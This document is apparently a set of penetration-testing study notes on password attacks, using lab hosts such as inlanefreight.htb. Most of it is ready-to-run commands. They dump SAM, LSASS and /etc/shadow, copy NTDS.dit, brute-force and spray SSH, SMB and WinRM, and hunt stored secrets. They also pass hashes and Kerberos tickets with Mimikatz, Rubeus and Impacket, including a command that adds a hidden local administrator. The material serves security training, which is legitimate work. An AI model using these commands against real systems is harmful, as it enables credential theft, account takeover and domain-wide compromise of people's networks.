Password Attacks

Introduction

• Passwords are still the most common way people prove who they are online. Simply put, a password or passphrase is a mix of letters, numbers, and symbols that confirms your identity. Every app or system that uses authentication checks your credentials against a database, either on your device or somewhere remote.

• Systems store these credentials in databases:

  • Linux: Encrypted passwords reside in the /etc/shadow file.

  • Windows: A more complex process involves multiple components, with encrypted passwords stored in the SAM file at %SystemRoot%\system32\config\SAM.

Attacking Methods

• There are a few main ways attackers try to crack passwords:

  • Dictionary Attacks: This method uses a pre-made list of words and phrases, called a dictionary, to guess passwords.

  • Brute Force Attacks: Here, attackers try every possible combination of characters until they find the right one.

  • Rainbow Table Attacks: These use pre-calculated tables of password hashes and their matching plaintext versions to speed up cracking.

• People often pick simple passwords they can remember, so companies set rules to make passwords stronger. But humans are clever at bending these rules. If a special character is needed, they might just tack one on at the end. If an uppercase letter is required, they’ll capitalize the first one.

• Attackers can use personal info, like a pet’s name or birthday, to make brute-forcing smarter. Tools like Hashcat help with this, while CeWL can scan a company’s website for words that might be passwords. People also tend to keep default passwords or reuse them across services. That’s where password spraying shines, once you get valid credentials, you try them everywhere.

cewl <Website_URL> -d <Depth> -m <Min_Length> --lowercase -w <Output_File>
# Example:
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

hashcat --force <Wordlist> -r <Rule_File> --stdout > <Output_File>
# Example:
hashcat --force password.list -r custom.rule --stdout > mut_password.list

Remote Password Attacks

• In a network, many protocols, like WinRM, SMB, SSH, and RDP, require login details. Most of these rely on passwords and can often be brute-forced. Tools such as Hydra, CrackMapExec, and Metasploit make these attacks possible.

crackmapexec smb <IP_Address> -u <Username> -p <Password> --shares
# Example: 
crackmapexec smb 10.129.201.126 -u Administrator -p P@ssw0rd! --shares

hydra -L <User_List> -P <Password_List> ssh://<IP_Address>
# Example:
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

crackmapexec winrm <IP_Address> -u <User_List> -p <Password_List>
# Example:
crackmapexec winrm 10.10.10.10 -u users.txt -p passwords.txt

Windows Local Password Attacks

• The Security Account Manager (SAM) is a database in Windows that holds credentials. If you’re on a Windows machine and have local admin access, you can copy the SAM database to your own system and crack its hashes offline. There are three key registry hives to grab:

  • HKLM\SAM: Stores hashes for local account passwords.

  • HKLM\SYSTEM: Holds the system bootkey, which encrypts the SAM database. You’ll need this to unlock it.

  • HKLM\SECURITY: Contains cached credentials for domain accounts.

• You can back up these hives with the reg.exe utility. Once you’ve got them, tools like secretdumps can pull out the hashes, and Hashcat can crack them. For domain passwords, CrackMapExec can help extract and crack LSA secrets.

reg.exe save hklm\<Hive> <Output_File>
# Example:
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

python3 secretsdump.py -sam <SAM_File> -security <Security_File> -system <System_File> LOCAL

# Example:
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

• Then there’s LSASS, a vital Windows service that manages credentials and authentication. When you log in, LSASS does things like:

  • Storing credentials in memory.

  • Creating access tokens.

  • Enforcing security rules.

  • Logging events to the Windows security log.

• To attack LSASS, you can dump its memory and extract credentials offline. One way is through Task Manager:

  • Open Task Manager.

  • Go to the Processes tab.

  • Find and right-click “Local Security Authority Process.”

  • Choose “Create dump file.”

• This creates an lsass.DMP file in C:\Users\<Your-Username>\AppData\Local\Temp. Or, from the command line, find the LSASS process ID (PID) with tasklist /svc in cmd or Get-Process lsass in PowerShell. Then, in an elevated PowerShell session, run:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> <Output_File> full
# Example:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

• Note that modern antivirus might block this as suspicious. Bypassing it is a whole other topic! Once you’ve got the dump file, use pypykatz to pull credentials:

pypykatz lsa minidump <Dump_File>

• Then crack the NT hash with Hashcat:

hashcat -m 1000 <NT_HASH> <Wordlist>
# Example:
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Linux Local Password Attacks

• In Linux, the /etc/passwd file lists all users and is readable by everyone. Its password field usually shows an "x", meaning passwords are in /etc/shadow, which only admins can read. Its format is $<type>$<salt>$<hashed>, with types like:

  • $1$ – MD5

  • $5$ – SHA-256

  • $6$ – SHA-512

• To crack /etc/shadow:

sudo cp /etc/passwd /tmp/passwd.bak
sudo cp /etc/shadow /tmp/shadow.bak
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked

Attacking Active Directory & NTDS.dit

Password Spraying/Brute-Forcing

• When a Windows system joins a domain, it stops using the local SAM database for logins. Instead, it asks the domain controller to verify credentials. In Active Directory, brute-forcing can create lots of logs and lock accounts, so attackers need to be sneaky. One trick is using Open-Source Intelligence (OSINT) to figure out username patterns, like "firstname.lastinitial" or "firstinitial.lastname", by checking company emails or online employee info. Tools like username-anarchy generate username lists, and CrackMapExec runs the attacks.

./username-anarchy -i <Name_List>

Capturing NTDS.dit

• NTDS (NT Directory Services) helps Active Directory organize network resources. The NTDS.dit file, found at %systemroot%\ntds on domain controllers, is its main database. It holds all domain usernames, password hashes, and more. If you grab this file, you could compromise every account in the domain.

• You’ll need local admin or Domain Admin rights to copy it. One method uses vssadmin to make a Volume Shadow Copy (VSS) of the C: drive (or wherever NTDS lives):

vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\<Shadow_Copy>\Windows\NTDS\NTDS.dit <Output_Path>
# Example:
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

• Or automate it with CrackMapExec:

crackmapexec smb <DC_IP> -u <User_Name> -p <Password> --ntds

• Extract the NT hashes and crack them with Hashcat

• If cracking fails, try a Pass-the-Hash attack with Evil-WinRM:

evil-winrm -i <DC_IP> -u <User_Name>-H "<NT_HASH>"

Credential Hunting

• Once you’re inside a system, hunting for credentials is a top priority. They can hide in files, logs, command histories, memory, browser data, databases, scripts, and more. You can search manually or use tools like LaZagne to automate it.

• On Windows, try:

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

• Or run:

start lazagne.exe all

• On Linux, we can check for:

• Configuration files:

for l in $(echo ".conf .config .cnf"); do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done

• Passwords in config files:

for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do echo -e "\nFile: $i"; grep "user\|password\|pass" $i 2>/dev/null | grep -v "#"; done

• Database files:

for l in $(echo ".sql .db .*db .db*"); do echo -e "\nDB File extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done

• SSH Keys:

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

• Check bash history:

tail -n5 /home/*/.bash*

• Run Mimipenguin:

python3 mimipenguin.py

Pass The Hash Attack

• In a Pass-the-Hash (PtH) attack, you use a password hash instead of the actual password. Windows’ NTLM protocol doesn’t salt hashes, so if you have one, you can authenticate without knowing the password. Once the hash is obtained, attackers can use it to authenticate to remote systems via various protocols such as SMB, WinRM, or RDP. Below are common methods and tools for executing PtH attacks:

• Get hashes with Mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

• Then use Mimikatz for PtH:

mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<ntlm_hash> /domain:<domain> /run:cmd.exe" exit
# Example:
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

• This opens a new command prompt authenticated as the specified user.

• Invoke-TheHash is an another PowerShell toolkit for performing PtH attacks over SMB or WMI. It does not require local administrator privileges on the attacking machine, but the user whose hash is used must have administrative rights on the target.

# SMB
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <target_ip> -Domain <domain> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose
# Example:
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

# WMIExec
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target <target> -Domain <domain> -Username <username> -Hash <ntlm_hash> -Command "<command>"
# Example:
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <encoded_command>"

• On Linux, we can use other tools like, Impacket, crackmapexec, or even rdp tools.

impacket-psexec <username>@<target_ip> -hashes :<ntlm_hash>
# Example:
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

crackmapexec smb <target_ip> -u <username> -d <domain> -H <ntlm_hash> -x "<command>"
# Example:
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

• For graphical access, we can use PtH over RDP with tools like xfreerdp. This requires that Restricted Admin Mode is enabled on the target system.

# Enable Restricted Admin Mode (if not already enabled):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Use xfreerdp with PtH:
xfreerdp /v:<target_ip> /u:<username> /pth:<ntlm_hash>
# Example:
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Restricted Admin Mode must be enabled on the target for RDP PtH to work. It is disabled by default in most environments.

Pass the Ticket (PtT)

• Pass the Ticket (PtT) is an attack technique where we steal and reuse Kerberos tickets to gain unauthorized access to network resources in an Active Directory environment. Kerberos uses two types of tickets:

  • TGT (Ticket Granting Ticket): Allows requesting service tickets from the Key Distribution Center (KDC).

  • TGS (Ticket Granting Service): Authenticates the user to a specific service.

• Unlike Pass the Hash (PtH), which relies on NTLM hashes, PtT exploits Kerberos tickets for authentication.

Extracting Tickets

• Attackers extract tickets from a compromised system using tools like Mimikatz or Rubeus:

• With Mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

• This exports tickets as .kirbi files.

• With Rubeus:

Rubeus.exe dump /nowrap

• This outputs tickets in base64 format for easy copying.

Running as a local administrator dumps all tickets.

Importing Tickets

• Once extracted, tickets are imported into a session to authenticate as the ticket’s user:

• With Mimikatz:

mimikatz # kerberos::ptt <path_to_kirbi_file>
# Example:
mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"

• With Rubeus:

Rubeus.exe ptt /ticket:<base64_ticket>
# Alternatively, use a .kirbi file:
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi

Pass the Key or OverPass the Hash

• Pass the Key, also called OverPass the Hash, uses a user’s password hash (e.g., NTLM or AES keys) to request a TGT from the KDC, creating a new Kerberos ticket without the plaintext password. Unlike traditional PtH, which avoids Kerberos, this method integrates with it.

Obtaining Hashes

• First, extract the user’s hash or Kerberos keys:

• With Mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

• This lists all Kerberos encryption keys (e.g., NTLM, AES256) for logged-on users.

Requesting a TGT

• Use the hash to forge a TGT:

  • With Mimikatz:

  mimikatz # sekurlsa::pth /domain:<domain> /user:<username> /ntlm:<ntlm_hash>
  # Example:
  mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

  • This opens a new session with the user’s security context.

  • With Rubeus:

  Rubeus.exe asktgt /domain:<domain> /user:<username> /rc4:<ntlm_hash> /ptt
  # Example: 
  Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt

  • The /ptt flag imports the ticket into the current session. Alternatively, use an AES256 key:

  Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap

Mimikatz typically requires administrative privileges to inject into LSASS, while Rubeus can request a TGT from a non-admin context if the hash is already obtained.

Using PtT with PowerShell Remoting

• Stolen Kerberos tickets can enable PowerShell Remoting for lateral movement. For this we need to be an admin, a member of the Remote Management Users group, or have explicit PowerShell Remoting permissions.

• With Mimikatz, Import the ticket:

mimikatz # privilege::debug
mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
mimikatz # exit

• Launch PowerShell and connect:

Enter-PSSession -ComputerName DC01

• With Rubeus, Create a sacrificial logon session:

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

• Import the ticket in the new session:

Rubeus.exe ptt /ticket:<base64_ticket>

• Use PowerShell Remoting from that session.

Pass the Ticket on Linux

• Linux systems integrated with Active Directory use Kerberos for authentication, storing tickets differently than Windows. We can exploit these tickets for access.

Identifying Domain Integration

Check if the system is domain-joined:

• With realm:

realm list

• Look for services like sssd or winbind running on the system.

Abusing ccache Files

• Kerberos tickets are stored as credential cache (ccache) files, typically in /tmp, with their location set in the KRB5CCNAME environment variable.

• Locate the ccache file:

env | grep -i krb5
# Example output: KRB5CCNAME=FILE:/tmp/krb5cc_647401106_I8I133

# Copy the file:
cp /tmp/krb5cc_647401106_I8I133 .

# Set the variable:
export KRB5CCNAME=/root/krb5cc_647401106_I8I133

# Verify with:
klist # Check "valid starting" and "expires" dates expired tickets are unusable.

# Authenticate to services:
smbclient //dc01/C$ -k -c ls
impacket-wmiexec dc01 -k

Abusing Keytab Files

• Keytab files store Kerberos keys for authentication without passwords.

• Find keytab files:

find / -name "*.keytab" -ls 2>/dev/null

# Inspect the keytab:
klist -k -t /opt/specialfiles/carlos.keytab
# Example output shows principal: carlos@INLANEFREIGHT.HTB.

# Obtain a TGT
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Access resources:
smbclient //dc01/carlos -k -c ls

# Extract hashes:
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab

# Crack with Hashcat or online tools like crackstation.net.

Tool Support

• Impacket: Use -k for Kerberos authentication:

impacket-wmiexec dc01 -k -no-pass

• Ensure KRB5CCNAME contains only the file path if FILE: prefix is present.

• Evil-WinRM: Requires krb5-user package and /etc/krb5.conf setup:

evil-winrm -i dc01 -r inlanefreight.htb

• Linikatz: Extracts credentials from AD-integrated Linux systems (requires root): Outputs tickets in linikatz.* folders as ccache or keytab files.

• Ticket Conversion: Convert ccache to .kirbi or vice versa:

impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi

Cracking Encrypted Files

Sensitive files may be password-protected. Use John the Ripper to crack them. Examples:

• SSH Keys:

ssh2john.py SSH.private > ssh.hash
john --wordlist=rockyou.txt ssh.hash

• Office Documents:

office2john.py Protected.docx > protected-docx.hash
john --wordlist=rockyou.txt protected-docx.hash